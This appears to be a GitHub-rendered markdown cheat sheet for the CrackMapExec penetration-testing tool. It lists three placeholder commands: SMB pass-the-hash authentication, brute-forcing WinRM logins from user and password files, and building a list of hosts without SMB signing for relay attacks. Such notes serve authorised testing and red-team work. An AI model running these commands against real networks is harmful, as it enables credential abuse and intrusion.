Skip to content

Latest commit

 

History

History
17 lines (14 loc) · 348 Bytes

crackmapexec.md

File metadata and controls

17 lines (14 loc) · 348 Bytes

Source

https://github.com/byt3bl33d3r/CrackMapExec

Authenticate via smb using hash

crackmapexec smb <rhost> -u <user> -H <hash>

Bruteforce winrm login

crackmapexec winrm <rhost> -u <userFile> -p <passwordFile>

List of servers with SMB signing flag

crackmapexec smb <rhost>/24 --gen-relay-list <outfile>